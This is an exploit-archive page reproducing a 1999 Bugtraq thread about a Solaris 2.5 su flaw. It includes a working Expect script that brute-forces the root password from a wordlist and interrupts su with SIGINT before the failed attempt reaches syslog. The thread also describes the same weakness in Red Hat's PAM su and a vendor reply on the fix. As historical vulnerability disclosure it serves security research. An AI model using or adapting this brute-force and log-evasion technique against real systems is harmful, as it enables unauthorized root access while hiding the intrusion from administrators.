what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

solaris.2.5.su.expect.txt

solaris.2.5.su.expect.txt
Posted Aug 17, 1999
Authored by Dr. Mudge

Sun Solaris 2.5 and earlier contain security hole in the 'su' program that allows scripted brute force attacks on the superuser password without the attacker being logged. Exploit script (coded in Expect) and detailed description included.

tags | exploit
systems | solaris
SHA-256 | bd95eaff399fd0d686613816ee376617456fc414c51f46f76e35100dc7c9da3e

solaris.2.5.su.expect.txt

Change Mirror Download
Date: Thu, 10 Jun 1999 14:13:06 -0500
From: Dr. Mudge <mudge@L0PHT.COM>
To: BUGTRAQ@netspace.org
Subject: Solaris 2.5 /bin/su [was: vulnerability in su/PAM in redhat]

The same sort of problem existed in solaris /bin/su on 2.5 and below.

The comments in the quick proof of concept sploit below should explain
further [heh - almost as high a comment/code ratio as Hobbit's netcat
source :) ].


-----SNIP SNIP-----

#!/usr/local/bin/expect --

# A quick little sploit for a quick round of beers :) mudge@L0pht.com

#
# This was something that had been floating around for some time.
# It might have been bitwrior that pointed out some of the oddities
# but I don't remember.
#
# It was mentioned to Casper Dik at some point and it was fixed in
# the next rev of Solaris (don't remember if the fix took place in
# 2.5.1 or 2.6 - I know it is in 2.6 at least).
#
# What happened was that the Solaris 2.5 and below systems
# had /bin/su written in the following fashion :
#
# attempt to SU
# |
# succesfull
# / \
# Y N
# | |
# exec cmd sleep
# |
# syslog
# |
# exit
#
# There were a few problems here - not the least of which was that they
# did not bother to trap signals. Thus, if you noticed su taking a while
# you most likely entered an incorrect password and were in the
# sleep phase.
#
# Sending a SIGINT by hitting ctrl-c would kill the process
# before the syslog of the invalid attempt occured.
#
# In current versions of /bin/su they DO trap signals.
#
# It should be noted that this is a fairly common coding problem that
# people will find in a lot of "security related" programs.
#
# .mudge


if { ($argc < 1) || ($argc > 1) } {
puts "correct usage is : $argv0 pwfile"
exit
}

set pwfile [open $argv "r"]

log_user 0
foreach line [split [read $pwfile] "\n"] {
spawn su root
expect "Password:"
send "$line\n"
# you might need to tweak this but it should be ok
set timeout 2
expect {
"#" { puts "root password is $line\n" ; exit }
}
set id [ exp_pid ]
exec kill -INT $id
}

-----SNIP SNIP------

cheers,

.mudge
---------
For more advisories check out:
http://www.L0pht.com/advisories.html [ That's L-zero-P-H-T ]
---------


On Wed, 9 Jun 1999, Tani Hosokawa wrote:

> I was talking to some guy on IRC (st2) and he asked me to mention to
> bugtraq (because he's not on the list) that the PAMified su that comes
> with redhat has a slight hole. When you try to su to root (for example) if
> it's successful, immediately gives you a shell prompt. Otherwise, it
> delays a full second, then logs an authentication failure to syslog. If
> you hit break in that second, no error, plus you know that the password
> was bad, so you can brute force root's password. I wrote a little
> threaded Perl prog that tested it (with a 0.25 second delay before the
> break) to attack my own password (with my password in the wordlist) and it
> seemed to work just fine, even with my own password hundreds of words down
> in the list, so it seems pretty predictable, as long as the server's under
> very little load (else you get a delay no matter what, and it screws the
> whole process by giving false negatives).
>
> ---
> tani hosokawa
> river styx internet
>

------------------------------------------------------------------------------

Date: Thu, 10 Jun 1999 22:40:51 +0200
From: Casper Dik <casper@HOLLAND.SUN.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Solaris 2.5 /bin/su [was: vulnerability in su/PAM in redhat]

>The same sort of problem existed in solaris /bin/su on 2.5 and below.
>
>The comments in the quick proof of concept sploit below should explain
>further [heh - almost as high a comment/code ratio as Hobbit's netcat
>source :) ].


The version of Solaris that fixed this made several changes;
Instead of

not trapping signals
and Sorry/sleep/syslog

the new version traps (some) signals and reorders the
calls to syslog/sleep/Sorry.

Of course, since you started the process you can still kill -9 it but
you won't know whether you typed the right password until long after
syslog() logged the bad "su".

Casper


Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close